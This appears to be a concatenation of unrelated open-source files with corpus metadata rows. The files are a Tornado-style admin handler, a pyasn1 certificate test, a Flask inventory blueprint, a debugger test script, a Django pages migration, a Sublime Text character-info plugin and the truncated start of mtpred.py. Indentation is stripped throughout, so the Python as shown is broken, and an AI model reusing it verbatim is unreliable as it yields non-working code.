Model.get_ordered_list_query().only_last().done()
)
)
)
item = Model(**fields_data)
try:
session.add(item)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.create(): ' +
'cannot create item by "%s" section:\n%s' % (str(section), e)
)
raise e
if section == 'redirect':
if not self._validate_redirect(fields_data):
return self.json_response({
'status': 'error',
'error_code': 'incorrect_data'
})
from app.app import application
application().handlers[0][1][:0] = [
self._get_redirect_router_item(fields_data)
]
try:
session.commit()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.create(): ' +
'cannot commit create item by "%s" section:\n%s' %
(str(section), e)
)
raise e
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def update(self, id, section, **fields_data):
Model = self._section_model_map[section]
fields = db_inspector.get_columns(Model.__tablename__)
fields_data_keys = fields_data.keys()
fields_data.update({
			# set as True flags that were checked and as False those that weren't;
			# only checked flags will be received from admin-panel front-end
field['name']: field['name'] in fields_data_keys
for field in fields
if field['name'].startswith('is_')
or field['name'].startswith('has_')
or field['name'].startswith('inherit_seo_')
})
session = Session()
try:
data = session.query(Model).filter_by(id=id)
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.update(): ' +
'cannot update element by "%s" section:\n%s' %
(str(section), e)
)
raise e
# TODO :: Clear shitcode
if section == 'redirect':
if not self._validate_redirect(fields_data):
return self.json_response({
'status': 'error',
'error_code': 'incorrect_data'
})
from app.app import application
hndlr = application().handlers[0][1]
for idx in range(len(hndlr)):
try:
if hndlr[idx].__dict__['kwargs']['url'] == data.one().new_url:
hndlr[idx] = self._get_redirect_router_item(fields_data)
except KeyError:
continue
data.update(fields_data)
try:
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.update(): ' +
'cannot commit update element by "%s" section:\n%s' %
(str(section), e)
)
raise e
finally:
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def delete(self, section, id):
Model = self._section_model_map_with_accounts[section]
if Model not in self._able_to_remove_elements_models:
warn(
'adm/AdminMainHandler.delete(): ' +
'model "%s" is not able to delete elements' % Model.__name__
)
return self.json_response({
'status': 'error',
'error_code': 'model_is_not_able_to_delete_elements'
})
session = Session()
# TODO :: support custom reordering
try:
session.query(Model).filter_by(id=id).delete()
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.delete(): ' +
'cannot delete element by id #%s:\n%s' % (str(id), e)
)
return self.json_response({
'status': 'error',
'error_code': 'system_fail'
})
finally:
session.close()
return self.json_response({'status': 'success'})
@query_except_handler
def get_data_list(self):
session = Session()
try:
data = session.query(NonRelationData).all()
except Exception as e:
warn(
'adm/AdminMainHandler.get_data_list(): ' +
'cannot get non-relation data elements:\n%s' % e
)
raise e
finally:
session.close()
return self.json_response({
'status': 'success',
'data_list': [x.item for x in data]
})
@query_except_handler
def get_fields(self, section, edit=False, id=None):
session = Session()
Model = self._section_model_map_with_accounts[section]
fields = db_inspector.get_columns(Model.__tablename__)
# TODO :: refactoring
types_map = {
'BOOLEAN': 'checkbox',
'TEXT': 'html',
'VARCHAR(4096)': 'text',
'VARCHAR(8192)': 'text',
'VARCHAR(1024)': 'text',
'VARCHAR(5000)': 'password',
'JSON': 'data_fields' if section == 'data' else 'files',
'INTEGER': 'text'
}
fields_list = []
for field in fields:
try:
# ignore 'id', 'section_id' and stuff
if 'id' in field['name'] or field['name'] == 'prev_elem':
continue
field_dict = {
'name': field['name'],
'type': types_map[str(field['type'])],
'default_val': field['default']
}
if field_dict['type'] == 'files':
if field_dict['name'] == 'main_image':
field_dict['mode'] = 'single'
else:
field_dict['mode'] = 'multiple'
fields_list.append(field_dict)
except KeyError:
continue
values = None
if edit and id is not None:
try:
data = session.query(Model).filter_by(id=id).one()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_fields(): ' +
'cannot get fields by "%s" model and id #%s:\n%s' %
(Model.__name__, id, e)
)
raise e
def get_field_type_by_name(name):
for item in fields_list:
if item['name'] == name:
return item['type']
# extract values from model
def value_resolver(key, val):
field_type = get_field_type_by_name(key)
if field_type == 'files':
try:
files = json.loads(val)
assert type(files) is list
except:
files = []
return json.dumps(files)
elif field_type == 'checkbox':
if type(val) is bool:
return val
else:
return False
else:
return val
values = { k: value_resolver(k, v) for k, v in data.item.items() }
if section == 'catalog_element':
values.update({'section_id': data.section_id})
if section == 'catalog_element':
try:
sections = session.query(CatalogSectionModel).all()
except Exception as e:
session.close()
warn(
'adm/AdminMainHandler.get_fields(): ' +
'cannot get catalog sections list:\n%s' % e
)
raise e
fields_list.append({
'name': 'section_id',
'type': 'select',
'default_val': None,
'list_values': [
{ 'title': x.title, 'value': x.id } for x in sections
]
})
session.close()
for k in ['create_date', 'last_change', '_sa_instance_state', 'password']:
try: del values[k]
except Exception: pass
return self.json_response({
'status': 'success',
'fields_list': fields_list,
'values_list': values
})
@query_except_handler
def reorder(self, section, target_id, at_id):
# TODO
# Model =
self._custom_ordering_models
if target_id == at_id:
self.json_response({'status': 'success'})
return
session = Session()
try:
# TODO :: multiple models
session.execute(
StaticPageModel
.get_reorder_page_query()
.page(target_id)
.place_before(at_id)
.done()
)
session.commit()
except Exception as e:
warn(
'adm/AdminMainHandler.reorder(): ' +
'cannot reorder "%d" at "%d":\n%s' % (target_id, at_id, e)
)
raise e
finally:
session.close()
self.json_response({'status': 'success'})
# helpers
# UrlMapping model
def _validate_redirect(self, fields_data):
try:
fields_data['status'] = int(fields_data['status']) \
if 'status' in fields_data \
and bool(fields_data['status']) \
else 300
if fields_data['status'] not in [300, 301]:
raise Exception('---invalid---')
except:
return False
return True
# UrlMapping model
def _get_redirect_router_item(self, fields_data):
return URLSpec(
pattern=fields_data['old_url'] + '$',
handler=RedirectHandler,
kwargs={
'url': fields_data['new_url'],
'permanent': fields_data['status'] == 301
},
name=None
)
| agpl-3.0 | -7,366,104,114,542,085,000 | 21.360305 | 76 | 0.617506 | false | 3.034811 | false | false | false |
etingof/pyasn1-modules | tests/test_rfc6187.py | 2 | 2505 | #
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
import sys
import unittest
from pyasn1.codec.der.decoder import decode as der_decoder
from pyasn1.codec.der.encoder import encode as der_encoder
from pyasn1_modules import pem
from pyasn1_modules import rfc5280
from pyasn1_modules import rfc6187
class SSHClientCertificateTestCase(unittest.TestCase):
cert_pem_text = """\
MIICkDCCAhegAwIBAgIJAKWzVCgbsG5BMAoGCCqGSM49BAMDMD8xCzAJBgNVBAYT
AlVTMQswCQYDVQQIDAJWQTEQMA4GA1UEBwwHSGVybmRvbjERMA8GA1UECgwIQm9n
dXMgQ0EwHhcNMTkxMDI0MTgyNjA3WhcNMjAxMDIzMTgyNjA3WjB0MQswCQYDVQQG
EwJVUzELMAkGA1UECBMCVkExEDAOBgNVBAcTB0hlcm5kb24xEDAOBgNVBAoTB0V4
YW1wbGUxEDAOBgNVBAMTB0NoYXJsaWUxIjAgBgkqhkiG9w0BCQEWE2NoYXJsaWVA
ZXhhbXBsZS5jb20wdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARfr1XPl5S0A/BwTOm4
/rO7mGVt2Tmfr3yvYnfN/ggMvyS3RiIXSsdzcAwzeqc907Jp7Dggab0PpaOKDOxD
WoK0g6B8+kC/VMsU23mfShlb9et8qcR3A8gdU6g8uvSMahWjgakwgaYwCwYDVR0P
BAQDAgeAMB0GA1UdDgQWBBQfwm5u0GoxiDcjhDt33UJYlvMPFTAfBgNVHSMEGDAW
gBTyNds0BNqlVfK9aQOZsGLs4hUIwTATBgNVHSUEDDAKBggrBgEFBQcDFTBCBglg
hkgBhvhCAQ0ENRYzVGhpcyBjZXJ0aWZpY2F0ZSBjYW5ub3QgYmUgdHJ1c3RlZCBm
b3IgYW55IHB1cnBvc2UuMAoGCCqGSM49BAMDA2cAMGQCMGEme38A3k8q4RGSEs2D
ThQQOQz3TBJrIW8zr92S8e8BNPkRcQDR+C72TEhL/qoPCQIwGpGaC4ERiUypETkC
voNP0ODFhhlpFo6lwVHd8Gu+6hShC2PKdAfs4QFDS9ZKgQeZ
"""
def setUp(self):
self.asn1Spec = rfc5280.Certificate()
def testDerCodec(self):
ssh_eku_oids = [
rfc6187.id_kp_secureShellClient,
rfc6187.id_kp_secureShellServer,
]
substrate = pem.readBase64fromText(self.cert_pem_text)
asn1Object, rest = der_decoder(substrate, asn1Spec=self.asn1Spec)
self.assertFalse(rest)
self.assertTrue(asn1Object.prettyPrint())
self.assertEqual(substrate, der_encoder(asn1Object))
count = 0
for extn in asn1Object['tbsCertificate']['extensions']:
if extn['extnID'] == rfc5280.id_ce_extKeyUsage:
extnValue, rest = der_decoder(
extn['extnValue'], asn1Spec=rfc5280.ExtKeyUsageSyntax())
for oid in extnValue:
if oid in ssh_eku_oids:
count += 1
self.assertEqual(1, count)
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
result = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not result.wasSuccessful())
| bsd-2-clause | 7,143,709,270,943,653,000 | 34.785714 | 76 | 0.766866 | false | 2.328067 | true | false | false |
Gloorf/ryzom_inventory | inventory.py | 1 | 4621 | #!/usr/bin/python3
import json
from flask import Blueprint, render_template
import flask_babel
from lib import load_data, Translator, required_roles, data_need_reload
from inventory_filters import dummy_filter, filter_3, filter_4, filter_6
# Gettext hack
_ = lambda x: x
class Manager:
def __init__(self, sort_items):
self._translator = Translator('en')
self._guilds = []
self._filters = []
self._sort_items = sort_items
with open("data/guilds.json", "r") as f:
keys = json.load(f)
for k in keys:
tmp = load_data(k, self._sort_items)
tmp.api_key = k
self._guilds.append(tmp)
self.add_filter(dummy_filter)
self.current_filter = self._filters[0]
self.current_guild = None
def add_filter(self, f):
self._filters.append(f)
    def refresh_guilds(self):
        # Rebinding the loop variable would not update the list itself, so
        # replace stale guilds in-place and keep the api_key set in __init__.
        for idx, g in enumerate(self._guilds):
            if data_need_reload(g.api_key):
                fresh = load_data(g.api_key, self._sort_items)
                fresh.api_key = g.api_key
                self._guilds[idx] = fresh
def get_items(self):
items = []
pick_from = []
if self.current_guild:
pick_from = [self.current_guild]
else:
pick_from = self._guilds
for g in pick_from:
for i in g.room:
# Filter directly, quantity will be dealt later (after merge)
if self.current_filter(i):
i.origins = [(g, i.stack)]
items.append(i)
# We need to assume there's at least one item in our list of items
# If not, just return directly
if not items:
return []
        # Sort our list, for a nice display (and faster merging)
        items.sort()
        # The list is sorted, so equal items sit next to each other and can be
        # merged in one pass: seed the running group with the first item,
        # start the loop at the second, and flush the last group afterwards.
        merged = []
        origins = [items[0].origins[0]]
        previous = items[0]
        for i in items[1:]:
            if i == previous:
                origins.append(i.origins[0])
            else:
                total_stack = sum(x[1] for x in origins)
                previous.origins = origins
                # Now that we merged our item, we can check quantity
                if self.current_filter.quantity() < total_stack:
                    merged.append(previous)
                origins = [i.origins[0]]
                previous = i
        # Flush the final group, which the loop above never emits.
        total_stack = sum(x[1] for x in origins)
        previous.origins = origins
        if self.current_filter.quantity() < total_stack:
            merged.append(previous)
        return merged
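    # Sketch of the merge above with made-up numbers: if guild A holds 3 of
    # item X and guild B holds 2 of the same X, the merged element carries
    # origins == [(A, 3), (B, 2)] and survives only when the current
    # filter's quantity() threshold is below the total stack of 5.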
# Used by templates
def guilds(self):
dummy = {"gid": "all", "name": _('All guilds')}
yield dummy
yield from self._guilds
# Used by templates
def filters(self):
yield from enumerate(self._filters)
# Used by templates
def tooltip(self, item):
out = self.translation(item)
for guild, number in item.origins:
out += " - {} ({})".format(guild.name, number)
return out
# Used by templates
def title(self):
if self.current_guild:
out = _('{} - {}'.format(self.current_guild.name, self.current_filter.description()))
else:
out = _('{} - {}'.format(_('All guilds'), self.current_filter.description()))
return out
def set_guild(self, id):
if id == 'all':
self.id = id
self.current_guild = None
else:
self.id = int(id)
self.current_guild = next(x for x in self._guilds if x.gid == self.id)
def set_filter(self, id):
try:
self.current_filter = self._filters[id]
except IndexError:
self.current_filter = self._filters[0]
def item_url(self, item):
total_stack = sum(x[1] for x in item.origins)
return 'http://api.ryzom.com/item_icon.php?q={0}&s={1}&sheetid={2}.sitem'.format(
item.quality, total_stack, item.sheet)
def translation(self, item):
return self._translator.translate(item)
def set_lang(self, lang):
self._translator.set_lang(lang)
def first_filter(item):
return all(x in item.tags for x in ["material", "supreme"])
inventory = Blueprint('inventory', __name__)
m = Manager(sort_items=True)
m.add_filter(filter_3)
m.add_filter(filter_4)
m.add_filter(filter_6)
@inventory.before_request
def adjust_locale_inv():
m.set_lang(str(flask_babel.get_locale()))
@inventory.route('/')
@required_roles('user')
def index():
return render_template('inventory/index.html', manager=m)
@inventory.route('/list/<guild>/<filter>/')
@required_roles('user')
def list_inventory(guild, filter):
m.refresh_guilds()
m.set_guild(guild)
m.set_filter(int(filter))
return render_template('inventory/list.html', manager=m)
| agpl-3.0 | 2,356,548,154,263,878,700 | 29.006494 | 97 | 0.565462 | false | 3.676213 | false | false | false |
SeanCline/PyExt | test/scripts/object_details.py | 1 | 1578 | import win32debug, sys, os
class D(object):
"""dict"""
def __init__(self, d1, d2):
self.d1 = d1
self.d2 = d2
def f(self):
self.d_uninitialized = 1
class S(object):
"""slots"""
__slots__ = 'slot1', 'slot2', 'slot_uninitialized'
def __init__(self, s1, s2):
self.slot1 = s1
self.slot2 = s2
class DsubD(D):
"""dict, parent dict"""
def __init__(self, d1, d2, d3):
D.__init__(self, d1, d2)
self.d3 = d3
class SsubS(S):
"""slots, parent slots"""
__slots__ = 'slot3'
def __init__(self, s1, s2, s3):
S.__init__(self, s1, s2)
self.slot3 = s3
class DsubS(S):
"""dict, parent slots"""
def __init__(self, s1, s2, d3):
S.__init__(self, s1, s2)
self.d3 = d3
class SsubD(D):
"""slots, parent dict"""
__slots__ = 'slot3'
def __init__(self, d1, d2, s3):
D.__init__(self, d1, d2)
self.slot3 = s3
class SsubDS(D, S):
"""slots, parents dict and slots"""
__slots__ = 'slot3'
def __init__(self, d1, d2, s1, s2, s3):
D.__init__(self, d1, d2)
S.__init__(self, s1, s2)
self.slot3 = s3
class NegDictOffset(tuple):
"""inheriting from tuple leads to a negative tp_dictoffset"""
def __init__(self, tupleValue):
self.attr = 'test'
d = D(1, 2)
s = S(1, 2)
dsubd = DsubD(1, 2, 3)
ssubs = SsubS(1, 2, 3)
dsubs = DsubS(1, 2, 3)
ssubd = SsubD(1, 2, 3)
ssubds = SsubDS(1, 2, 3, 4, 5)
negDictOffset = NegDictOffset((1, 2, 3))
win32debug.dump_process("object_details.dmp")
| mit | -1,804,687,212,342,609,000 | 18.725 | 65 | 0.515843 | false | 2.60396 | false | false | false |
dlancer/django-pages-cms | pages/migrations/0001_initial.py | 1 | 14896 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import markitup.fields
import mptt.fields
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
('auth', '0006_require_contenttypes_0002'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=200)),
('ptype', models.CharField(default='page', max_length=64, verbose_name='Type')),
('template', models.CharField(max_length=254, blank=True)),
('comment', models.TextField(max_length=254, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('date_approved', models.DateTimeField(null=True, verbose_name='Approved', blank=True)),
('date_publication', models.DateTimeField(null=True, verbose_name='Publication date', blank=True)),
('date_publication_end', models.DateTimeField(null=True, verbose_name='Publication end date', blank=True)),
('is_draft', models.BooleanField(default=True, verbose_name='Draft')),
('is_approved', models.BooleanField(default=False, verbose_name='Approved')),
('is_hidden', models.BooleanField(default=False, verbose_name='Hidden')),
('is_published', models.BooleanField(default=False, verbose_name='Published')),
('is_login_required', models.BooleanField(default=False, verbose_name='Login required')),
('is_permission_required', models.BooleanField(default=False, verbose_name='Permission required')),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('created_by', models.ForeignKey(related_name='page_creator', to=settings.AUTH_USER_MODEL, null=True)),
('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='pages.Page', null=True)),
('sites', models.ManyToManyField(help_text='The site(s) where this pages is accessible.', to='sites.Site', verbose_name='sites')),
('updated_by', models.ForeignKey(related_name='page_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ['tree_id', 'lft'],
'get_latest_by': 'date_publication',
'verbose_name': 'Page',
'verbose_name_plural': 'Pages',
'permissions': (('view_page', 'Can view pages'),),
},
),
migrations.CreateModel(
name='PageContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
],
options={
'verbose_name': 'Content',
'verbose_name_plural': 'Content',
},
),
migrations.CreateModel(
name='PageContentType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type')),
('class_name', models.CharField(max_length=100, verbose_name='Class')),
('admin_class_name', models.CharField(max_length=100, verbose_name='Admin Class')),
('is_extended', models.BooleanField(default=False, verbose_name='Extended')),
],
options={
'verbose_name': 'Content Type',
'verbose_name_plural': 'Content Types',
},
),
migrations.CreateModel(
name='PageGroupObjectPermission',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content_object', models.ForeignKey(to='pages.Page')),
('group', models.ForeignKey(to='auth.Group')),
('permission', models.ForeignKey(to='auth.Permission')),
],
options={
'verbose_name': 'Page Group Permissions',
'verbose_name_plural': 'Pages Groups Permissions',
},
),
migrations.CreateModel(
name='PageMarkdownContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('text', markitup.fields.MarkupField(no_rendered_field=True, blank=True)),
('is_template', models.BooleanField(default=False, verbose_name='Template?')),
('_text_rendered', models.TextField(editable=False, blank=True)),
('created_by', models.ForeignKey(related_name='pages_pagemarkdowncontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagemarkdowncontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Markdown',
'verbose_name_plural': 'Markdown',
},
),
migrations.CreateModel(
name='PageMetaContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('title', models.CharField(max_length=160, blank=True)),
('description', models.TextField(max_length=160, blank=True)),
('keywords', models.CharField(max_length=200, blank=True)),
('is_noindex', models.BooleanField(default=False, verbose_name='NoIndex')),
('is_nofollow', models.BooleanField(default=False, verbose_name='NoFollow')),
('created_by', models.ForeignKey(related_name='pages_pagemetacontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagemetacontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Meta',
'verbose_name_plural': 'Meta',
},
),
migrations.CreateModel(
name='PageRedirectContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('redirect_to_page', models.CharField(max_length=254, null=True, blank=True)),
('redirect_to_url', models.URLField(max_length=254, null=True, blank=True)),
('is_permanent', models.BooleanField(default=False, verbose_name='Permanent')),
('created_by', models.ForeignKey(related_name='pages_pageredirectcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pageredirectcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Redirect',
'verbose_name_plural': 'Redirect',
},
),
migrations.CreateModel(
name='PageSlugContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('slug', models.CharField(max_length=245)),
('created_by', models.ForeignKey(related_name='pages_pageslugcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pageslugcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Slug',
'verbose_name_plural': 'Slugs',
},
),
migrations.CreateModel(
name='PageTextContent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=100, verbose_name='Type', db_index=True)),
('language', models.CharField(default=b'en', max_length=5)),
('sid', models.CharField(unique=True, max_length=200)),
('name', models.CharField(unique=True, max_length=200, blank=True)),
('is_extended', models.BooleanField(default=False, verbose_name='Extended?')),
('comment', models.CharField(max_length=250, blank=True)),
('date_created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Created')),
('date_updated', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Updated')),
('text', models.TextField(blank=True)),
('is_template', models.BooleanField(default=False, verbose_name='Template?')),
('created_by', models.ForeignKey(related_name='pages_pagetextcontent_creator', to=settings.AUTH_USER_MODEL, null=True)),
('page', models.ForeignKey(verbose_name='Page', to='pages.Page')),
('updated_by', models.ForeignKey(related_name='pages_pagetextcontent_editor', to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'abstract': False,
'verbose_name': 'Text',
'verbose_name_plural': 'Text',
},
),
migrations.CreateModel(
name='PageUserObjectPermission',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content_object', models.ForeignKey(to='pages.Page')),
('permission', models.ForeignKey(to='auth.Permission')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Page User Permissions',
'verbose_name_plural': 'Pages Users Permissions',
},
),
migrations.AddField(
model_name='pagecontent',
name='type',
field=models.ForeignKey(to='pages.PageContentType'),
),
migrations.AlterUniqueTogether(
name='pageslugcontent',
unique_together=set([('language', 'page')]),
),
migrations.AlterUniqueTogether(
name='pagemetacontent',
unique_together=set([('language', 'page')]),
),
migrations.AlterUniqueTogether(
name='pagecontent',
unique_together=set([('page', 'type')]),
),
]
| bsd-3-clause | -6,709,578,750,606,742,000 | 59.064516 | 146 | 0.578075 | false | 4.355556 | false | false | false |
michaelhogg/sublime-character-info | character_info.py | 1 | 3320 | import sublime, sublime_plugin, unicodedata
# Needed because unicodedata.name() doesn't return names of control characters
# See stackoverflow.com/questions/24552786/why-doesnt-unicodedata-recognise-certain-characters
UNNAMED_CONTROL_CHARS = {
0x00: 'NULL',
0x01: 'START OF HEADING',
0x02: 'START OF TEXT',
0x03: 'END OF TEXT',
0x04: 'END OF TRANSMISSION',
0x05: 'ENQUIRY',
0x06: 'ACKNOWLEDGE',
0x07: 'BELL',
0x08: 'BACKSPACE',
0x09: 'CHARACTER TABULATION',
0x0A: 'LF: LINE FEED',
0x0B: 'LINE TABULATION',
0x0C: 'FF: FORM FEED',
0x0D: 'CR: CARRIAGE RETURN',
0x0E: 'SHIFT OUT',
0x0F: 'SHIFT IN',
0x10: 'DATA LINK ESCAPE',
0x11: 'DEVICE CONTROL ONE',
0x12: 'DEVICE CONTROL TWO',
0x13: 'DEVICE CONTROL THREE',
0x14: 'DEVICE CONTROL FOUR',
0x15: 'NEGATIVE ACKNOWLEDGE',
0x16: 'SYNCHRONOUS IDLE',
0x17: 'END OF TRANSMISSION BLOCK',
0x18: 'CANCEL',
0x19: 'END OF MEDIUM',
0x1A: 'SUBSTITUTE',
0x1B: 'ESCAPE',
0x1C: 'INFORMATION SEPARATOR FOUR',
0x1D: 'INFORMATION SEPARATOR THREE',
0x1E: 'INFORMATION SEPARATOR TWO',
0x1F: 'INFORMATION SEPARATOR ONE',
0x7F: 'DELETE',
0x80: 'CONTROL U+0080',
0x81: 'CONTROL U+0081',
0x82: 'BREAK PERMITTED HERE',
0x83: 'NO BREAK HERE',
0x84: 'CONTROL U+0084',
0x85: 'NEL: NEXT LINE',
0x86: 'START OF SELECTED AREA',
0x87: 'END OF SELECTED AREA',
0x88: 'CHARACTER TABULATION SET',
0x89: 'CHARACTER TABULATION WITH JUSTIFICATION',
0x8A: 'LINE TABULATION SET',
0x8B: 'PARTIAL LINE FORWARD',
0x8C: 'PARTIAL LINE BACKWARD',
0x8D: 'REVERSE LINE FEED',
0x8E: 'SINGLE SHIFT TWO',
0x8F: 'SINGLE SHIFT THREE',
0x90: 'DEVICE CONTROL STRING',
0x91: 'PRIVATE USE ONE',
0x92: 'PRIVATE USE TWO',
0x93: 'SET TRANSMIT STATE',
0x94: 'CANCEL CHARACTER',
0x95: 'MESSAGE WAITING',
0x96: 'START OF GUARDED AREA',
0x97: 'END OF GUARDED AREA',
0x98: 'START OF STRING',
0x99: 'CONTROL U+0099',
0x9A: 'SINGLE CHARACTER INTRODUCER',
0x9B: 'CONTROL SEQUENCE INTRODUCER',
0x9C: 'STRING TERMINATOR',
0x9D: 'OPERATING SYSTEM COMMAND',
0x9E: 'PRIVACY MESSAGE',
0x9F: 'APPLICATION PROGRAM COMMAND'
}
def getUnicodeCharName(char):
charName = unicodedata.name(char, 'Unknown') # Get the Unicode name assigned to the character
charCode = ord(char)
if charName == 'Unknown' and charCode in UNNAMED_CONTROL_CHARS:
charName = UNNAMED_CONTROL_CHARS[charCode]
return charName
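# Illustrative examples of the lookup above:
#   getUnicodeCharName(u'A')  -> 'LATIN CAPITAL LETTER A'
#   getUnicodeCharName(u'\n') -> 'LF: LINE FEED' (resolved via UNNAMED_CONTROL_CHARS)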
def updateStatusBar(view):
char = view.substr(view.sel()[0].a) # The character at the cursor or start of selection
hexCode = hex(ord(char)).upper().replace('X','x')
statusString = 'Char ' + hexCode
viewEncoding = view.encoding()
if viewEncoding == 'UTF-8' or viewEncoding == 'Undefined':
# The encoding may be Undefined if the file only contains 7-bit ASCII characters
# which are common to many encodings (UTF-8, ISO-8859-1, Windows-1251, etc)
charName = getUnicodeCharName(char)
statusString += ' (' + charName + ')'
view.set_status('zzCharacterInfo', statusString)
class CharacterInfoListener(sublime_plugin.EventListener):
def on_selection_modified(self, view):
updateStatusBar(view)
| mit | 709,713,128,041,639,400 | 34.319149 | 100 | 0.65512 | false | 3.105706 | false | false | false |
bulik/mtpred | mtpred.py | 1 | 6089 | #!/usr/bin/env python
'''
(c) 2015-Present Brendan Bulik-Sullivan
Multi-trait genetic prediction.
'''
from __future__ import division
import argparse
import time
from core import bayes
from core import ld
import traceback
import sys
import pandas as pd
try:
x = pd.DataFrame({'A': [1, 2, 3]})
x.drop_duplicates(subset='A')
except TypeError:
raise ImportError('mtpred requires pandas version > 0.15.2')
__version__ = '0.1'
MASTHEAD = "*************************************\n"
MASTHEAD += "* Multi-Trait Prediction (mtpred)\n"
MASTHEAD += "* Version {V}\n".format(V=__version__)
MASTHEAD += "* (C) 2015 Brendan Bulik-Sullivan\n"
MASTHEAD += "* Broad Institute of MIT and Harvard\n"
MASTHEAD += "* GNU General Public License v3\n"
MASTHEAD += "*************************************\n"
def sec_to_str(t):
'''Convert seconds to days:hours:minutes:seconds'''
[d, h, m, s, n] = reduce(
lambda ll, b: divmod(ll[0], b) + ll[1:], [(t, 1), 60, 60, 24])
f = ''
if d > 0:
f += '{D}d:'.format(D=int(d))
if h > 0:
f += '{H}h:'.format(H=int(h))
if m > 0:
f += '{M}m:'.format(M=int(m))
